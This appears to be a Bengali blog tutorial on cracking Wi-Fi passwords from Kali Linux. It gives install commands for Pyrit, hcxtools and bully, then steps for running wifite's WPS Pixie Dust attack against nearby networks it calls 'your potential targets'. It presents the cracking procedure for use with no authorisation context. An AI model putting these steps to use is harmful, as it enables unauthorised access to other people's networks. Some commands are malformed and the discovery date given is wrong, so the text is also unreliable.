WI-FI Hacking Prosese By Kali Linux


 


সকল টুলস গুলো দেখে দেখে ইন্সটল করবেন 

১। সর্ব প্রথম  আমাদের Microsoft Visual C++ সফটওয়্যার টি ডাউনলোড করে ইন্সটল করতে হবে 

Link


২|  এবার ভার্চুয়াল বক্স ডাউনলোড দিয়ে ইন্সটল দিতে হবে

Link


৩| এবারে ডাউনলোড দিতে হবে কালি ভার্চুয়াল বেশিন

Link


আশাকরি সবগুলো ডাউনলোড করে ইন্সটল করেছেন

এবার ভিডিও দেখে কমান্ট গুলো দিয়ে দিন




cd /etc/apt

ls

sudo nano sources list

deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware


sudo apt install libpcap-dev

sudo apt install python2.7-dev libssl-dev zlib1g-dev libpcap-dev

git clone https://github.com/JPaulMora/Pyrit.git

cd Pyrit

sudo apt install python

python setup.py clean

python setup.py build

sudo python setup.py install

sudo apt install hcxdumptool

sudo apt update

sudo apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev

git clone https://github.com/ZerBea/hcxtools

cd hcxtools

make

sudo apt install hcxtools

sudo make install

sudo apt install bully

kali apt update

kali apt upgrade

sudo wifite --kill
  1. 1 No. Check the networks with WPS = yes. These are your potential targets.
  2. 2 No. Now, wait until you see your target and then hit “Ctrl+C” This stops and prompts you to input the target’s number

Attack the target network

  1. Check the target’s Num and type it in the console. In our case, that’s 1. Wifite will now do the rest
  2. If successful, wifite will output the cracked WPS PIN and the network password

Interestingly, this attack can even detect the most sophisticated passwords:

Vulnerability Overview: WPS Pixie Dust Attack

In 2024 the researcher Dominique Bongard discovered an odd situation. He found out that some wireless access points had weak algorithms for generating nonces


Website


Next Post Previous Post
No Comment
Add Comment
comment url